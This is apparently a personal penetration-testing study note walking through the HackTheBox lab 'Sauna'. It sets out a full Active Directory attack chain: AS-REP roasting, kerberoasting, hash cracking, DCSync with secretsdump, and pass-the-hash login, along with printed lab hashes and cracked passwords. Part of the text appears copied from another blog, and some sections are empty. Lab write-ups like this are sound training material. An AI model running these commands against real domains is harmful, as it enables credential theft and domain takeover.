htb-ad-4-sauna - My-oscp-all-things

***System IP ： 10.10.10.175*** ### Summary **1- Overview** **2- Enumeration** 2.1- Nmap Scan 2.2- Web Site Discovery 2.3- Active Directory Enumeration **3- Privilege Escalation** 3.1- Post-Compromise Enumeration 3.2- New Account Enumeration 3.3- Post-Compromise Exploitation ## 1- Overview ```text ``` ## 2- **Enumeration** ### 2.1-Service Enumeration **Using autoNmap for scanning：** ```bash /mnt/nmapAutomator/nmapAutomator.sh -o ./ -t all 10.10.10.175 ``` **Using rustscan for scanning：** ``` rustscan -a 10.10.10.175 -u 5000 -- -A ``` **The results are as follows:** ``` PORT STATE SERVICE REASON VERSION 53/tcp open domain? syn-ack ttl 127 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-01-16 18:08:19Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 3269/tcp open tcpwrapped syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host TCP/IP fingerprint: SCAN(V=7.91%E=4%D=1/16%OT=53%CT=%CU=%PV=Y%DS=11%DC=T%G=N%TM=61E3F98E%P=x86_64-pc-linux-gnu) OPS(O1=M54BNW8NNS%O2=M54BNW8NNS%O3=M54BNW8%O4=M54BNW8NNS%O5=M54BNW8NNS%O6=M54BNNS) WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70) ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M54BNW8NNS%CC=Y%Q=) T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=N) U1(R=N) IE(R=Y%DFI=N%TG=80%CD=Z) ``` ### 2.3 - Website Enumeration ```bash python3 dirsearch.py -u http://10.10.10.175/ -e php,txt -w /usr/share/SecLists/Discovery/Web-Content/big.txt ``` ![[Pasted image 20220116191512.png]] nothing useful find but we can from the website find some people name,and we also cewl the website to userenum but nothing find. ![[Pasted image 20220116185519.png]] ``` Fergus Smith Shaun Coins Hugo Bear Bowie Taylor Sophie Driver Steven Kerb ``` ### 2.2- Active Directory Enumeration **search some ldap information** Let’s begin with using ldapsearch to grab general information: ```bash ldapsearch -x -s base namingcontexts -h 10.10.10.175 ``` the resultes ```text # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: namingcontexts # # dn: namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 ``` We can konw the DC domain is : EGOTISTICAL-BANK.LOCAL , add it to /etc/hosts Let’s try to find more information about users if we can… First thing we can try is the command **enumdomers** with rpcclient. But we have to try a null authentication and we don’t have any information from our nmap scan which could make think it will work: ``` ``` Indeed, the access is denied… If we try with enum4linux, we don’t find more information about users either, and crackmapexec does not give a better result. Another idea is to try [Impacket](https://github.com/SecureAuthCorp/impacket) using GetADUsers.py against users but don’t find antyhing more here: but i guess it's must have some dc username,because when i run ![[Pasted image 20220116185926.png]] ``` ldapsearch -x -D '' -w '' -b "DC=EGOTISTICAL-BANK,DC=LOCAL" -h 10.10.10.175 ``` results ``` # extended LDIF # # LDAPv3 # base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree # filter: (objectclass=*) # requesting: ldapsearch # # EGOTISTICAL-BANK.LOCAL dn: DC=EGOTISTICAL-BANK,DC=LOCAL # Users, EGOTISTICAL-BANK.LOCAL dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL # Computers, EGOTISTICAL-BANK.LOCAL dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL # Domain Controllers, EGOTISTICAL-BANK.LOCAL dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL # System, EGOTISTICAL-BANK.LOCAL dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL # LostAndFound, EGOTISTICAL-BANK.LOCAL dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL # Infrastructure, EGOTISTICAL-BANK.LOCAL dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL # ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL # Program Data, EGOTISTICAL-BANK.LOCAL dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL # NTDS Quotas, EGOTISTICAL-BANK.LOCAL dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL # Managed Service Accounts, EGOTISTICAL-BANK.LOCAL dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL # Keys, EGOTISTICAL-BANK.LOCAL dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL # TPM Devices, EGOTISTICAL-BANK.LOCAL dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL # Builtin, EGOTISTICAL-BANK.LOCAL dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL # Hugo Smith, EGOTISTICAL-BANK.LOCAL dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL # search reference ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTIST ICAL-BANK,DC=LOCAL # search reference ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTIST ICAL-BANK,DC=LOCAL # search reference ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOC AL # search result search: 2 result: 0 Success # numResponses: 19 # numEntries: 15 # numReferences: 3 ``` and then i use the vi macro to create a userlist like this ![[Pasted image 20220116190205.png]] ``` Fergus Smith Fergus.Smith FSmith F_Smith F_Smith Shaun Coins Shaun.Coins SCoins S_Coins S_Coins Hugo Bear Hugo.Bear HBear H_Bear H_Bear Bowie Taylor Bowie.Taylor BTaylor B_Taylor B_Taylor Sophie Driver Sophie.Driver SDriver S_Driver S_Driver Steven Kerb Steven.Kerb SKerb S_Kerb S_Kerb ``` ``` /opt/Active_domain/kerbrute userenum -d EGOTISTICAL-BANK.LOCAL user --dc 10.10.10.175 ``` ![[Pasted image 20220116190453.png]] and i find a username : Fsmith and also find user sauna try asrep. ``` impacket-GetNPUsers -no-pass -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile user -format hashcat ``` results: ``` Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [-] User sauna doesn't have UF_DONT_REQUIRE_PREAUTH set [email protected]:9bcbea17ca46713ba35bc234c4401ed2$8b496860c550d133b28a9b11ef23e70167850def18055d935e9fb7e6e77de7e60ffcba6dabd42347eb73ce805df17c9b378963cdc8687b419209efe9b7445c166096948e36a16286d516e2063bc86a2c3908e367626c5cd50f9e48d091d783a74ffca59fec042ede0538468590e16777f7cc3d8c82ec4028f63cd00438ec87bce2b23e47028ba10c45e11d584037f6c201349caf23ad7a49854363c1c189f15d80817e2a2d3881b6f5fcaad36115f012dc731136438bdfd594ac7882553ca43365dad2f09acc94c5613f017c3e33f6819e69b081782db33868985b83c6fa699f2644462d99018f1b843fdb251b262bd9939a83fdc7bd7566411348fccd42c1f5 ``` ![[Pasted image 20220116190613.png]] crack it from hashcat module 18200 ``` hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt ``` Fsmith : Thestrokes23 ![[Pasted image 20220116190651.png]] test impacket-secretdump and impacket-GetUserSPNs ``` impacket-GetUserSPNs EGOTISTICAL-BANK.LOCAL/Fsmith:Thestrokes23 -request -dc-ip 10.10.10.175 ``` ![[Pasted image 20220116190816.png]] it's look running but get a mistake: ``` [-] Principal: EGOTISTICAL-BANK.LOCAL\HSmith - Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) ``` we can ntpdate 10.10.10.175 and run it again ![[Pasted image 20220116190918.png]],okay that's running,and we can get the Hsmith hash. ``` $krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$dfdaf04b9c9f05bae305be7e23c82420$8fcac55a50c4c10f4589dfed4c0494334831e959f69f029b99c7bfe888b1dd8f16a99ba9e6742e94af3a299c0a4d3e7066e3503de0e4e83de6ce4fa86549d3d2c6a294f3bc287aa4ab582895a405550e6c8aed9851e5570f216850259d1cd0ceead6768f3f1735d0c2ea4c4498098b4fd26bb14fb59c7867b9fd3466e560aa000a15d6ae79820f0b8f0f2ae83a25e7c16e9285b43bc554df5042317de5c53336aae2864c08dbe51cc7a80aaed7d504e5b54b11b1e5ac08d5a27028b8821b9293e2f791cadb3289fe7c1964d6268b08f51b6abeffd5af1c2d4cfe4767879de3aea5902123d68600864a37292e9cc2cc49d64b2662ed4ef6c1ea55e88269b1e12d06b5b1c278432bf86a2c938d080b61f01f67299b9a9efd0edfdc016756cfe45ded3a49fac0fb15dafc60f4d1e0f4a387648ff763d9fa9cc4fbf21157e79bb668ca062aff8368d12b4a35be8146fcd0c278cec9132a2cb3309fe041d814fc65b8df803179f0b2dc692d05440b41e319549c1ff871ad861141c6e1f87e52a6fca7c153f3600d67d9f576cbc3cb7f52c10186ae1f2a9508602523bcc3f6136957d8a7d6297f5b92698fbe0ac3f2633714994b0c2e287da5ac4626d26d09076850c0ecf45c352e9c77b2bc8656ccc1030a99a2f8eb6bb762b801365a684e858ce6e84908b34db4c69e2b02a075f0ca00e5501bff9904c2272b9f4b2793e13f5ae73ae7bd2bfeb571292ffbbcc62f2a0e16631c41c636287bc8114a834f7a827513af3e2569659ef0db003f6385d6fe8807895402a895299c9738de63f7779082f09b0e42c7fb6bbed5c909c5e1ec20ac514afda4bd0bc2cd5aa1d1782b4b7e467fd52a11667ed2739aff2953ce1c603b0d65572dc0005dcf60b1fc95740c700b8ca1a14211139c9fc377d61f0fb7307a68248adbfbfb59662052a08615f5b54bb344cd46dc26296ec9510a4637df55e2204ec2c35dc1a0ebdd24f15ce87512220b9ce930750f1ff080e6dfbcce75fe0221118b5cf703539c2c8c91969811ea8bd54bfc89b16ab62a87cdd4e2551ff52e0210ed6bbc75140fe214de0fcf43ebbb9f70fbfff32e83b5676355a16b97bbd36c9201af3645415ea7702b23919407c912a2470f78133a3d7266edaa50164fcf5980e114a317bbf976d7b12ea5680ea5d2eca7d1593364bcf3320d697516dd29969fd665cf79783f22f6831c404e195f1e3ae4d0b90f82395dd064021a6ece52a179ab203f1daff17ea07679430d3a328cce17cc605107980dab312c04c29064a6c2fd7ff35b2ecabc5d901ba61dbab293509625ff8e1e06bcd5abc16db264fd62d3bb32f30a73b8d81157df61e6c6c2c77d92f60d7e82c281673dc3f17597bb321cd5457843bc44fd8d84290557df051cd490102d299c ``` crack it by john ```bash john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` ![[Pasted image 20220116191102.png]] Hsmith : Thestrokes23 , oh that's same password. now we try secretdump the DC hash. and it fail ``` impacket-secretsdump EGOTISTICAL-BANK.LOCAL/[email protected] ``` ``` crackmapexec winrm 10.10.10.175 -u user -p pass --continue-on-success smbmap -H 10.10.10.175 -u Hsmith -p Thestrokes23 smbmap -H 10.10.10.175 -u Fsmith -p Thestrokes23 ``` ![[Pasted image 20220116192159.png]] use evil-winrm to login ``` evil-winrm -i sauna.htb -u 'Fsmith' -p Thestrokes23 ``` ![[Pasted image 20220116192322.png]] run bloodhound to collect information about ad machine ``` python3 /opt/Active_domain/bloodhound/BloodHound.py/bloodhound.py -u Fsmith -p Thestrokes23 -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c all ``` We can see this one, write acl to administrator ![[Pasted image 20220116192950.png]] ### Getting Root Having gained access to the machine, we begin local enumeration using [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS). While looking at the results, we see that credentials for the `svc_loanmanager` are located in the `HKLM\Software\Microsoft\Windows_NT\Currentversion\WinLogon` registry key. - ![](https://i0.wp.com/KhaoticDev.net/wp-content/uploads/2020/04/winpeas.png?resize=738%2C80&ssl=1) Got a password for svc_loanmanager Using Impacket’s **secretsdump.py** with these new credentials, we are able to dump domain password hashes. `$ secretsdump.py` `'EGOTISTICAL-BANK/svc_loanmgr:[email protected]'` - ![](https://i1.wp.com/KhaoticDev.net/wp-content/uploads/2020/04/secretsdump-1.png?fit=1024%2C197&ssl=1) Dumping AD hashes Using the hash for `administrator`, we are able to use **evil-winrm** to log into the machine and retrieve `root.txt` ``` evil-winrm.rb -i 10.10.10.175 -u administrator -H passwordhash ``` ![[Pasted image 20220507164950.png]] ## 3- Privilege Escalation ### 3.1- Post-Compromise Enumeration like whoami /all \ peas.exe \... informations gathering but it useful thing